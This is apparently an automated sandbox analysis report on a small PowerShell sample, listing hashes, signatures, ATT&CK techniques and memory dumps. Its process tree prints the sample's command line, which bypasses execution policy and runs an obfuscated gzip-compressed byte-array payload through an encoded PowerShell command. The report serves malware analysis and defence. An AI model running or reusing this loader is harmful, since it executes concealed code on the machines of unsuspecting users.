Overview

overview

10

Static

static

10

8fb4e3c26f...18.ps1

windows7-x64

3

8fb4e3c26f...18.ps1

windows10-2004-x64

3

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    02-06-2024 22:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8fb4e3c26fc4a6f00ca89254461e4c4c_JaffaCakes118.ps1

  • Size

    2KB

  • MD5

    8fb4e3c26fc4a6f00ca89254461e4c4c

  • SHA1

    fb6d612cc0dc220c1c2751bfd3036cb07218b8a6

  • SHA256

    e63a896d198d1ac7a498979910f0581ff7cb36142f0f94f493a7afc1a0273b0c

  • SHA512

    8e285b1ff74bb577ffe20b2ea91801a5bccf97f939b4e1604cf0fafb4d6f78bbdcf8a4427e24bfffc1d6cfc81f8bc86e56a2e6963565a098ae1f9842218f9637

Score
3/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8fb4e3c26fc4a6f00ca89254461e4c4c_JaffaCakes118.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e =New-Object IO.MemoryStream "31 139 8 0 0 0 0 0 0 0 165 86 251 111 226 72 18 254 57 252 21 222 8 105 131 146 96 12 132 71 70 35 77 27 48 54 96 30 6 108 66 20 157 218 118 219 110 104 187 29 63 120 100 118 254 247 107 99 194 45 51 187 123 210 157 37 11 119 81 245 85 125 213 213 93 53 71 201 227 60 137 176 149 168 212 70 220 163 142 162 24 211 128 171 22 10 197 46 85 18 238 43 247 237 247 66 17 198 49 242 77 114 204 150 183 133 155 52 198 129 203 205 143 113 130 252 47 215 203 178 150 6 9 246 81 89 9 18 20 209 112 142 162 29 182 80 204 212 2 232 163 56 132 22 226 112 176 65 86 194 125 47 220 220 132 169 73 176 197 89 132 185 224 156 52 176 78 210 155 87 137 64 55 126 227 206 127 163 32 245 57 64 8 181 96 194 194 91 28 67 196 125 231 58 212 247 113 22 98 229 32 84 42 149 7 78 67 49 115 135 78 146 42 147 112 63 254 14 75 69 62 141 142 211 136 38 44 144 140 240 119 174 119 64 86 154 32 13 65 219 136 112 146 163 212 255 1 99 193 104 114 207 92 138 3 70 133 83 2 7 7 159 102 210 249 57 27 119 9 81 252 144 70 201 221 237 22 69 1 34 181 106 217 38 228 182 116 1 140 19 70 140 225 30 88 210 2 134 149 76 147 136 211 113 148 164 144 156 120 223 157 101 36 4 182 29 161 56 126 200 29 219 251 57 254 64 231 133 67 174 115 116 17 159 137 150 190 252 63 225 116 34 4 19 180 240 216 143 253 159 112 242 53 72 88 17 153 44 125 127 138 43 129 214 54 15 238 162 204 100 81 114 33 112 17 79 97 196 106 131 249 186 24 159 124 49 22 167 180 255 73 51 247 166 216 255 35 147 12 220 128 56 145 104 52 103 53 75 208 196 204 42 241 147 141 39 195 192 38 44 224 211 214 218 123 21 19 130 99 100 209 192 142 79 30 217 118 254 40 220 126 99 135 195 162 126 136 9 138 216 118 143 209 254 49 199 225 84 108 69 52 166 78 82 238 204 61 24 133 231 159 14 59 91 108 11 118 216 70 81 161 24 102 108 227 107 195 243 225 201 20 187 52 251 205 209 47 31 151 12 197 159 246 101 13 57 40 66 129 133 108 144 159 78 140 226 50 203 173 6 3 23 221 125 187 187 61 99 102 249 120 224 94 167 113 238 234 173 124 86 63 150 71 231 82 41 149 46 160 125 20 160 136 237 178 18 228 39 132 69 89 92 68 41 42 20 217 150 165 36 59 108 23 234 159 193 125 226 73 17 245 231 52 141 44 116 119 134 123 224 46 55 71 169 80 120 21 143 9 122 125 123 43 238 96 244 47 43 187 110 190 114 175 23 226 193 14 69 201 219 243 115 134 34 194 24 53 234 217 189 20 184 119 183 252 4 15 0 123 94 148 128 168 246 96 139 5 101 207 94 149 189 75 92 83 104 183 105 15 7 27 153 87 173 78 60 237 75 45 128 247 238 222 106 141 129 229 224 150 52 88 49 189 25 174 40 45 96 119 70 51 25 75 123 89 27 2 91 100 50 247 5 11 174 11 236 233 102 218 243 71 99 37 22 133 51 78 110 111 213 235 242 170 2 106 181 250 164 86 217 218 104 144 233 111 129 61 246 241 254 48 98 223 22 176 39 35 145 217 85 20 210 27 116 52 211 168 74 107 131 200 124 93 242 28 131 198 243 70 125 109 195 254 19 177 129 72 237 42 73 161 174 209 133 108 249 34 207 235 13 112 122 14 188 96 175 116 246 194 110 104 32 232 240 2 242 183 217 31 198 135 60 88 234 210 59 16 36 13 142 98 17 0 113 177 236 123 43 188 230 251 124 91 159 53 94 246 76 75 52 89 78 230 16 128 35 85 180 249 146 12 22 75 34 210 134 176 76 39 204 7 182 96 119 47 136 212 237 170 0 40 129 11 93 109 6 189 182 1 101 189 31 80 147 23 244 214 201 63 220 181 23 186 239 38 162 231 53 249 182 33 237 193 125 239 232 246 0 232 202 188 231 172 43 162 18 60 53 246 132 190 199 43 188 114 50 92 137 106 115 9 169 236 91 117 218 43 232 218 154 206 252 38 130 227 118 152 223 221 30 236 88 112 79 135 218 82 54 164 110 136 120 246 124 200 124 99 221 99 60 186 225 113 198 176 39 222 46 19 143 132 245 118 102 244 64 31 87 106 82 203 241 227 150 60 213 220 181 233 120 96 149 54 87 105 176 150 119 238 98 182 22 234 129 229 130 67 179 177 188 247 251 51 191 137 102 135 78 123 52 116 134 242 71 87 48 70 2 57 134 166 24 11 252 168 109 119 94 234 74 91 231 103 254 208 223 246 119 233 96 219 189 175 213 200 76 212 173 170 126 28 45 165 96 109 60 85 38 88 28 155 181 48 52 251 7 111 244 177 76 213 14 160 47 213 118 98 245 165 10 52 6 241 122 17 187 11 125 60 208 230 224 105 180 1 77 69 178 67 211 215 118 118 77 117 23 100 230 142 113 253 48 57 138 171 133 96 85 199 221 216 213 229 65 184 238 235 169 221 105 9 39 253 222 96 58 95 46 159 38 21 125 162 85 148 176 59 163 160 190 217 172 131 137 211 15 6 187 77 181 31 242 187 192 136 146 246 104 131 121 207 159 8 97 219 180 228 221 220 150 103 47 114 93 146 55 6 178 222 183 3 47 144 135 102 79 190 63 198 106 253 136 147 195 56 4 250 76 211 96 91 239 116 95 154 114 210 137 70 157 102 117 103 245 42 123 168 136 14 121 178 134 189 173 218 76 14 42 219 106 217 110 141 7 201 178 71 241 123 56 29 78 59 243 133 233 54 187 62 232 249 129 102 144 33 134 211 65 144 174 167 71 5 139 211 190 48 135 104 33 16 119 112 223 72 63 98 47 153 97 107 44 249 31 129 71 25 172 163 224 173 163 120 239 181 149 178 177 95 52 189 121 239 117 182 120 217 233 213 17 49 252 94 83 56 136 31 161 108 137 148 52 43 195 253 211 120 186 56 0 93 49 49 220 171 53 165 97 27 126 232 247 104 93 174 14 1 28 45 120 181 182 9 14 241 251 126 225 2 56 237 8 148 176 90 52 66 192 234 120 198 106 154 178 23 0 201 166 198 80 91 60 177 26 219 54 183 249 105 177 137 182 172 7 129 94 117 129 194 150 75 97 77 123 33 28 212 119 188 238 89 98 229 64 99 25 88 19 118 198 87 196 80 167 20 59 53 86 119 234 97 180 81 142 106 167 94 25 207 235 135 241 162 151 99 205 190 126 189 101 247 82 209 76 29 231 116 147 191 230 131 73 57 155 67 216 85 116 213 127 217 120 113 185 184 202 35 20 184 137 199 221 115 194 195 149 209 253 117 255 101 24 159 35 201 163 57 137 254 139 106 62 206 252 4 248 243 160 194 244 126 30 84 74 5 236 112 119 175 34 165 228 237 183 51 153 18 155 72 10 55 69 151 80 19 146 231 203 221 93 251 194 164 17 74 82 214 11 11 63 10 175 255 60 179 149 85 24 197 30 36 167 216 194 227 221 133 255 3 151 101 35 247 244 107 90 74 133 215 188 159 190 113 197 228 212 175 127 77 237 213 44 81 185 198 203 151 149 107 90 57 80 41 155 14 127 97 213 188 102 117 110 85 213 95 189 254 85 235 63 35 255 148 246 108 0 96 6 159 67 93 169 240 59 107 250 74 22 207 153 218 243 115 204 70 27 238 17 189 115 173 83 84 113 54 218 60 110 168 201 50 127 234 126 119 69 88 226 148 222 138 245 64 238 7 247 200 114 12 226 90 149 123 4 145 155 250 136 13 34 249 128 253 7 183 103 81 157 12 255 96 3 172 133 240 14 61 14 168 201 136 32 18 163 12 250 4 146 41 51 217 191 1 168 104 124 244 177 11 0 0"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2176

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    12010a314d8a75bffbf9f80413b723b9

    SHA1

    6123fe1d4777f7462c5098e73f31c9dce09ecfe5

    SHA256

    5a470a613d99c5ef000e40b9eafbe6d695ef95ba3146e535f9d2921eb60ba80d

    SHA512

    fdce808a2c371ab6eed5c4996062e477bae18641cda130b61bdcc37383aa3296c6b289f4bf2dcdb221fa6c371909bbcf156c9d2a61911dfecd830189b8eb5772

    Download Submit
  • memory/2988-4-0x000007FEF53FE000-0x000007FEF53FF000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2988-5-0x000000001B630000-0x000000001B912000-memory.dmp
    Filesize

    2.9MB

    Download
  • memory/2988-6-0x0000000002790000-0x0000000002798000-memory.dmp
    Filesize

    32KB

    Download
  • memory/2988-7-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/2988-13-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/2988-14-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/2988-15-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp
    Filesize

    9.6MB

    Download